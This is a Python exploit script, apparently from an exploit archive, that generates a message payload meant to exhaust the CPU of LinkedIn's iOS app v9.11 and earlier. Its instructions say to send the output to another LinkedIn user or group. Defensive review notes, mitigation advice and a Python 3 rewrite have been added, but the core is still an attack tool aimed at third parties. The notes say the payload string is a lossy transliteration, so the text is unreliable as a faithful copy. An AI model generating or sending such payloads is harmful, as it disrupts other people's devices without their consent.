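#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Linkedin Mobile iOS - v9.11 < CPU Resource exhaustion
#
# Found this and more exploits at my open source security project: http://www.exploitpack.com
# Date and time of release: 2 August 2018
#
# How to use:
# Run the script and copy the content of the file, send it as a message to another Linkedin user.
#
# Description:
# Linkedin Mobile iOS v9.11 and prior are affected. The application fails to
# properly filter user-supplied input and it is prone to remote CPU exhaustion.
# This exploit uses the same bug discovered for WhatsApp: https://www.exploit-db.com/exploits/43107/
#
# OS Version: iPhone OS 11.4.1 (Build 15G77)
# Architecture: arm64
# Report Version: 19
# Hardware model: iPhone7,1
# Action taken: Process killed
# CPU: 48s seconds cpu time over 62 seconds ( 93% cpu average ), exceeding limit of 80% cpu over 60 seconds.
# Active cpus: 2
# 49 ??? (libdyld.dylib + 4032) [0x182e0dfc0]
# 49 ??? (LinkedIn + 213856) [0x100c04360]
# 49 ??? (UIKit + 3266392) [0x18d39c758]
# 49 ??? (GraphicsServices + 45088) [0x185362020]
# 49 ??? (CoreFoundation + 48552) [0x18337cda8]
#
# Review notes (defensive reading):
# - The crash excerpt above records the process being killed for exceeding the
#   CPU limit (80% over 60 seconds); every sampled frame sits under the LinkedIn
#   binary and UIKit. The page gives no deeper root cause than "fails to properly
#   filter user-supplied input".
# - For teams shipping messaging clients, the general mitigation for this bug
#   class is to bound message length and filter or normalise unusual character
#   runs before the text reaches layout/rendering, and to apply the same limits
#   on the service that relays the message so one client cannot stall another.
# - The header says "v9.11 and prior" while the banner string names
#   9.11.8592.4; the page does not say which build was actually tested.
# - NOTE(review): the text literal in linkedin() appears to be an ASCII
#   transliteration of the original non-ASCII characters (lossy page
#   extraction). It is kept exactly as published, with only the embedded
#   apostrophe escaped so the file parses; the original bytes are not restored.
# - The script was written for Python 2 (print statements, reload(sys)); the
#   form below runs unchanged on Python 2 and Python 3.

import sys


def linkedin(filename):
    """Write the repeated message text to *filename* as UTF-8 bytes.

    The text unit is repeated 158 times, encoded once, and written in binary
    mode. An existing file at *filename* is overwritten without confirmation.

    Compared with the published script this drops the
    ``reload(sys)`` / ``sys.setdefaultencoding("utf-8")`` hack: the encoded
    value was computed there but never used, and the implicit encoding done
    by the default-encoding override produced the same bytes that are now
    written explicitly. The file handle is also closed deterministically.
    """
    # Kept as published on the page (see the review note in the header).
    unit = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O\' Ou OP O* O, O1 Oo U U U U U U'
    payload = unit * 158
    encoded = payload.encode('UTF-8')

    print("[*] Writing to file: " + filename)
    # Binary mode: the bytes on disk are exactly the UTF-8 encoding, with no
    # dependence on the interpreter's default encoding or newline translation.
    with open(filename, 'wb') as handle:
        handle.write(encoded)
    print("[*] Done.")


def howtouse():
    """Print the usage text to stdout and exit with status -1."""
    print("Usage: linkedin.py [FILENAME]")
    print("[*] Mandatory arguments:")
    print("[!] FILENAME")
    sys.exit(-1)


if __name__ == "__main__":
    print("[*] Linkedin iOS 9.11.8592.4 iOS - CPU Resource exhaustion by Juan Sacco")
    print("[*] How to use: Copy the content of the file and send it as a message to another linkedin user or group")
    # Check the argument count up front instead of catching IndexError around
    # the whole call, which would also hide an IndexError raised while writing.
    if len(sys.argv) < 2:
        howtouse()
    linkedin(sys.argv[1])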